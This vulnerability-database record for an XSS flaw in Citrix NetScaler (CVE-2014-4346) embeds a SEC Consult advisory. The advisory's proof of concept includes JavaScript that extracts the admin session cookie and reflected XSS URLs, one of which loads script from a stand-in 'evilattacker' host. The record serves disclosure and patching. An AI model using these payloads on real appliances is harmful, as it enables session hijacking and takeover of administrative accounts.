var-201407-0463
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in administration user interface in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway (formerly Access Gateway Enterprise Edition) 10.1 before 10.1-126.12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Citrix NetScaler Application Delivery Controller 10.x prior 10.1-126.12 and 9.x prior 9.3-62.4 are vulnerable. Note: Citrix NetScaler Gateway is formerly known as Citrix Access Gateway Enterprise Edition. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
SEC Consult Vulnerability Lab Security Advisory < 20140716-2 >
title: Multiple vulnerabilities
product: Citrix NetScaler Application Delivery Controller
Citrix NetScaler Gateway
vulnerable version: <9.3-62.4 <10.1-126.12 fixed version: >=9.3-62.4 >=10.1-126.12 CVE: CVE-2014-4346, CVE-2014-4347 impact: High homepage: http://www.citrix.com found: 2014-01-05 by: Stefan Viehb\xf6ck SEC Consult Vulnerability Lab https://www.sec-consult.com =======================================================================
Vendor/product description:
"Citrix NetScaler helps organizations build enterprise cloud networks that embody the characteristics and capabilities that define public cloud services, such as elasticity, expandability and simplicity. NetScaler brings to enterprise IT leaders multiple advanced technologies that were previously available only to large public cloud providers."
"As an undisputed leader of service and application delivery, Citrix NetScaler solutions are deployed in thousands of networks around the globe to optimize, secure and control the delivery of all enterprise and cloud services. They deliver 100 percent application availability, application and database server offload, acceleration and advanced attack protection. Deployed directly in front of web and database servers, NetScaler solutions combine high-speed load balancing and content switching, http compression, content caching, SSL acceleration, application flow visibility and a powerful application firewall into a single, easy-to-use platform."
URL: http://www.citrix.com/products/netscaler-application-delivery-controller/overview.html
Business recommendation:
Attackers can exploit XSS and other vulnerabilities that lead to cookie disclosure to execute administrative actions.
Affected Systems should be updated as soon as possible.
Vulnerability overview/description:
1) Cookie disclosure The error handler in the Apache g_soap module prints all of the request header information including the HTTP Cookie field. This vulnerability can be used in XSS attacks to gain access to the otherwise well protected (HttpOnly) "SESSID" cookie of an administrator.
2) Reflected Cross-Site Scripting (XSS) Citrix Netscaler suffers from multiple reflected Cross-Site Scripting vulnerabilities, which allow an attacker to steal user information, impersonate users and perform administrative actions on the appliance.
There are many parameters which are not properly sanitized and thus vulnerable to XSS.
Proof of concept:
1) Cookie disclosure A GET request to the SOAP handler returns the following information:
GET /soap HTTP/1.1
Host:
Response: HTTP/1.1 200 OK ... Content-Type: text/html
...mod_gsoap Apache SOAP Server Error
No body received
...
Cookie: SESSID=*SESSION ID*;
...
In combination with an XSS vulnerability (see 2) an attacker can use the following
code to extract cookies including the SESSID cookie of an administrator:
var request = new XMLHttpRequest();
request.open('GET', '/soap', false);
request.send();
lines=request.responseText.split('
')
for (var i in lines){
if (lines[i].indexOf('Cookie')==0){
alert(lines[i]);
break;
}
}
2) Reflected Cross-Site Scripting
Accessing the following URL will include the Javascript code from http://evilattacker/evil.js:
http://
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201407-0463",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netscaler application delivery controller",
"scope": "eq",
"trust": 1.6,
"vendor": "citrix",
"version": "10.1"
},
{
"model": "netscaler access gateway",
"scope": "eq",
"trust": 1.6,
"vendor": "citrix",
"version": "10.1"
},
{
"model": "netscaler application delivery controller",
"scope": "eq",
"trust": 1.0,
"vendor": "citrix",
"version": null
},
{
"model": "netscaler access gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "citrix",
"version": null
},
{
"model": "netscaler application delivery controller",
"scope": null,
"trust": 0.8,
"vendor": "citrix",
"version": null
},
{
"model": "netscaler application delivery controller",
"scope": "lt",
"trust": 0.8,
"vendor": "citrix",
"version": "10.1 thats all 10.1-126.12"
},
{
"model": "netscaler gateway",
"scope": null,
"trust": 0.8,
"vendor": "citrix",
"version": null
},
{
"model": "netscaler gateway",
"scope": "lt",
"trust": 0.8,
"vendor": "citrix",
"version": "10.1 thats all 10.1-126.12"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003365"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-362"
},
{
"db": "NVD",
"id": "CVE-2014-4346"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:citrix:netscaler_application_delivery_controller",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:citrix:netscaler_application_delivery_controller_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:citrix:netscaler_access_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:citrix:netscaler_gateway_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003365"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stefan Viehb\u00f6ck of SEC Consult",
"sources": [
{
"db": "BID",
"id": "68535"
}
],
"trust": 0.3
},
"cve": "CVE-2014-4346",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2014-4346",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-72286",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-4346",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2014-4346",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201407-362",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-72286",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72286"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003365"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-362"
},
{
"db": "NVD",
"id": "CVE-2014-4346"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in administration user interface in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway (formerly Access Gateway Enterprise Edition) 10.1 before 10.1-126.12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. \nCitrix NetScaler Application Delivery Controller 10.x prior 10.1-126.12 and 9.x prior 9.3-62.4 are vulnerable. \nNote: Citrix NetScaler Gateway is formerly known as Citrix Access Gateway Enterprise Edition. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nSEC Consult Vulnerability Lab Security Advisory \u003c 20140716-2 \u003e\n=======================================================================\n title: Multiple vulnerabilities\n product: Citrix NetScaler Application Delivery Controller\n\t\t\t Citrix NetScaler Gateway\n vulnerable version: \u003c9.3-62.4\n \u003c10.1-126.12\n fixed version: \u003e=9.3-62.4\n\t \u003e=10.1-126.12\n CVE: CVE-2014-4346, CVE-2014-4347\n impact: High\n homepage: http://www.citrix.com\n found: 2014-01-05\n by: Stefan Viehb\\xf6ck\n SEC Consult Vulnerability Lab\n https://www.sec-consult.com\n=======================================================================\n\nVendor/product description:\n- -----------------------------\n\"Citrix NetScaler helps organizations build enterprise cloud networks that\nembody the characteristics and capabilities that define public cloud services,\nsuch as elasticity, expandability and simplicity. NetScaler brings to\nenterprise IT leaders multiple advanced technologies that were previously\navailable only to large public cloud providers.\"\n\n\"As an undisputed leader of service and application delivery, Citrix NetScaler\nsolutions are deployed in thousands of networks around the globe to optimize,\nsecure and control the delivery of all enterprise and cloud services. They\ndeliver 100 percent application availability, application and database server\noffload, acceleration and advanced attack protection. Deployed directly in\nfront of web and database servers, NetScaler solutions combine high-speed load\nbalancing and content switching, http compression, content caching, SSL\nacceleration, application flow visibility and a powerful application firewall\ninto a single, easy-to-use platform.\"\n\nURL: http://www.citrix.com/products/netscaler-application-delivery-controller/overview.html\n\n\nBusiness recommendation:\n- ------------------------\nAttackers can exploit XSS and other vulnerabilities that lead to cookie disclosure\nto execute administrative actions. \n\nAffected Systems should be updated as soon as possible. \n\n\nVulnerability overview/description:\n- -----------------------------------\n1) Cookie disclosure\nThe error handler in the Apache g_soap module prints all of the request header\ninformation including the HTTP Cookie field. This vulnerability can be used in\nXSS attacks to gain access to the otherwise well protected (HttpOnly) \"SESSID\"\ncookie of an administrator. \n\n2) Reflected Cross-Site Scripting (XSS)\nCitrix Netscaler suffers from multiple reflected Cross-Site Scripting\nvulnerabilities, which allow an attacker to steal user information,\nimpersonate users and perform administrative actions on the appliance. \n\nThere are many parameters which are not properly sanitized and thus\nvulnerable to XSS. \n\n\nProof of concept:\n- -----------------\n1) Cookie disclosure\nA GET request to the SOAP handler returns the following information:\n\nGET /soap HTTP/1.1\nHost: \u003chost\u003e\n*OTHER HEADER FIELDS*\n\nResponse:\nHTTP/1.1 200 OK\n... \nContent-Type: text/html\n\n\u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\"\u003e\n\u003cHTML\u003e\n... \n \u003cBODY\u003e\n \u003cH1\u003emod_gsoap Apache SOAP Server Error\u003c/H1\u003e\n\u003cp\u003e\u003cstrong\u003eNo body received\u003c/strong\u003e\n... \n\u003cbr\u003eCookie: SESSID=*SESSION ID*;\n... \n\nIn combination with an XSS vulnerability (see 2) an attacker can use the following\ncode to extract cookies including the SESSID cookie of an administrator:\n\nvar request = new XMLHttpRequest();\nrequest.open(\u0027GET\u0027, \u0027/soap\u0027, false);\nrequest.send();\nlines=request.responseText.split(\u0027\u003cbr\u003e\u0027)\nfor (var i in lines){\n if (lines[i].indexOf(\u0027Cookie\u0027)==0){\n\t\talert(lines[i]);\n\t\tbreak;\n\t}\n}\n\n2) Reflected Cross-Site Scripting\nAccessing the following URL will include the Javascript code from http://evilattacker/evil.js:\nhttp://\u003chost\u003e/menu/topn?name=\";\u003c%2fscript\u003e\u003cscript+src%3d\"http:%2f%2fevilattacker%2fevil.js\"\u003e\u003c%2fscript\u003e\n\nOther pages do not sanitize user input properly as well:\nhttp://\u003chost\u003e/pcidss/launch_report?type=AA\";alert(\u0027xss\u0027);x=\"\n\nhttp://\u003chost\u003e/menu/guiw?nsbrand=AA\u003c\"\u0027\u003eAA\u0026protocol=BB\u003c\"\u0027\u003eBB\u0026id=CC\u003c\"\u0027\u003eCC\nNote: Content-Type is application/x-java-jnlp-file, so the injected script code\nis not interpreted. However, it is possible to inject arguments into a Java\nJNLP file, which might be used in further attacks. \n\n\nVulnerable / tested versions:\n- -----------------------------\nThe vulnerabilities have been verified to exist in Citrix NetScaler VPX 10.0,\nwhich was the most recent version at the time of discovery. \nAccording to the vendor versions before 10.1-126.12 and 9.3-62.4 are vulnerable\n\n\nVendor contact timeline:\n- ------------------------\n2014-01-09: Sending advisory and proof of concept exploit via encrypted\n channel. \n2014-01-17: Vendor acknowledges receipt of advisory. \n2014-04-04: Requesting status update. \n2014-06-10: Vendor is \"in the process of scheduling the release of a security\n bulletin\". \n2014-07-07: Requesting list of affected/non-affected versions CVE-IDs. \n2014-07-07: Vendors is \"still in the final stages of releasing the bulletin\". \n2014-07-07: Requesting info about cause of delay. \n2014-07-07: Vendor is \"still hopeful that the bulletin will be available soon\". \n2014-07-14: Vendor states that fixed version will be available on July 15/16. \n2014-07-16: SEC Consult releases coordinated security advisory. \n\n\nSolution:\n- ---------\nUpdate to a more recent version of Citrix NetScaler. \n\nMore information can be found at:\nhttps://support.citrix.com/article/ctx140863\n\n\nWorkaround:\n- -----------\nNo workaround available. \n\n\nAdvisory URL:\n- -------------\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nSEC Consult Vulnerability Lab\n\nSEC Consult\nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius\n\nHeadquarter:\nMooslackengasse 17, 1190 Vienna, Austria\nPhone: +43 1 8903043 0\nFax: +43 1 8903043 15\n\nMail: research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nInterested in working with the experts of SEC Consult?\nWrite to career@sec-consult.com\n\nEOF Stefan Viehb\\xf6ck / @2014\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (MingW32)\nComment: Using GnuPG with Thunderbird - http://www.enigmail.net/\n\niQEcBAEBAgAGBQJTxmWgAAoJECyFJyAEdlkKWLYH/0wpELCJemzmkj2HaotFZJtt\n4C4/hsHWGbxmi2VbeiwGvYKHtDsw2KBDWlTrVTef3UrBnbAv6jFncTCjOv3eU6Ze\n9swUmwxzNB9zqGvhYwEpcO8tSQu0H3xDMvbpKqYvq2qaBSm4YmJyUrDlwwSkCUnq\nycGqzfidkAXoMUu/6wdam5251zXcR33n1KRfr3AH65p/OoOXrvasgY395Cty9zqW\nyfBvEIEs845aE/gbjbp40qvroz1dG8Z2LP4ykFWywVme0imgSD6nv/33Z0tDmlcD\nf7JjK8F7R7Q8l4J54n0iclXCWZhoS3pfabd60NXMzMmxroMuksmiNycm7yLGfe4=\n=KicK\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-4346"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003365"
},
{
"db": "BID",
"id": "68535"
},
{
"db": "VULHUB",
"id": "VHN-72286"
},
{
"db": "PACKETSTORM",
"id": "127496"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-72286",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72286"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-4346",
"trust": 2.9
},
{
"db": "SECTRACK",
"id": "1030573",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1030572",
"trust": 1.7
},
{
"db": "BID",
"id": "68535",
"trust": 1.4
},
{
"db": "SECUNIA",
"id": "59942",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003365",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201407-362",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "127496",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-72286",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72286"
},
{
"db": "BID",
"id": "68535"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003365"
},
{
"db": "PACKETSTORM",
"id": "127496"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-362"
},
{
"db": "NVD",
"id": "CVE-2014-4346"
}
]
},
"id": "VAR-201407-0463",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-72286"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:08:19.596000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "CTX140863",
"trust": 0.8,
"url": "http://support.citrix.com/article/CTX140863"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003365"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72286"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003365"
},
{
"db": "NVD",
"id": "CVE-2014-4346"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://support.citrix.com/article/ctx140863"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id/1030572"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id/1030573"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/68535"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/532802/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2014/jul/77"
},
{
"trust": 1.1,
"url": "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140716-2_citrix_netscaler_multiple_vulnerabilities_v10.txt"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/59942"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/94493"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4346"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4346"
},
{
"trust": 0.4,
"url": "http://www.citrix.com"
},
{
"trust": 0.1,
"url": "http://www.citrix.com/products/netscaler-application-delivery-controller/overview.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-4346"
},
{
"trust": 0.1,
"url": "http://www.enigmail.net/"
},
{
"trust": 0.1,
"url": "http://\u003chost\u003e/menu/guiw?nsbrand=aa\u003c\"\u0027\u003eaa\u0026protocol=bb\u003c\"\u0027\u003ebb\u0026id=cc\u003c\"\u0027\u003ecc"
},
{
"trust": 0.1,
"url": "https://www.sec-consult.com"
},
{
"trust": 0.1,
"url": "http://\u003chost\u003e/menu/topn?name=\";\u003c%2fscript\u003e\u003cscript+src%3d\"http:%2f%2fevilattacker%2fevil.js\"\u003e\u003c%2fscript\u003e"
},
{
"trust": 0.1,
"url": "http://\u003chost\u003e/pcidss/launch_report?type=aa\";alert(\u0027xss\u0027);x=\""
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-4347"
},
{
"trust": 0.1,
"url": "https://twitter.com/sec_consult"
},
{
"trust": 0.1,
"url": "http://blog.sec-consult.com"
},
{
"trust": 0.1,
"url": "http://evilattacker/evil.js:"
},
{
"trust": 0.1,
"url": "https://www.sec-consult.com/en/vulnerability-lab/advisories.htm"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72286"
},
{
"db": "BID",
"id": "68535"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003365"
},
{
"db": "PACKETSTORM",
"id": "127496"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-362"
},
{
"db": "NVD",
"id": "CVE-2014-4346"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-72286"
},
{
"db": "BID",
"id": "68535"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003365"
},
{
"db": "PACKETSTORM",
"id": "127496"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-362"
},
{
"db": "NVD",
"id": "CVE-2014-4346"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-07-16T00:00:00",
"db": "VULHUB",
"id": "VHN-72286"
},
{
"date": "2014-07-14T00:00:00",
"db": "BID",
"id": "68535"
},
{
"date": "2014-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-003365"
},
{
"date": "2014-07-16T22:42:07",
"db": "PACKETSTORM",
"id": "127496"
},
{
"date": "2014-07-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201407-362"
},
{
"date": "2014-07-16T14:19:03.997000",
"db": "NVD",
"id": "CVE-2014-4346"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-72286"
},
{
"date": "2014-07-21T00:19:00",
"db": "BID",
"id": "68535"
},
{
"date": "2014-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-003365"
},
{
"date": "2014-07-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201407-362"
},
{
"date": "2024-11-21T02:10:00.743000",
"db": "NVD",
"id": "CVE-2014-4346"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201407-362"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Citrix NetScaler Application Delivery Controller and NetScaler Gateway Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003365"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "127496"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-362"
}
],
"trust": 0.7
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.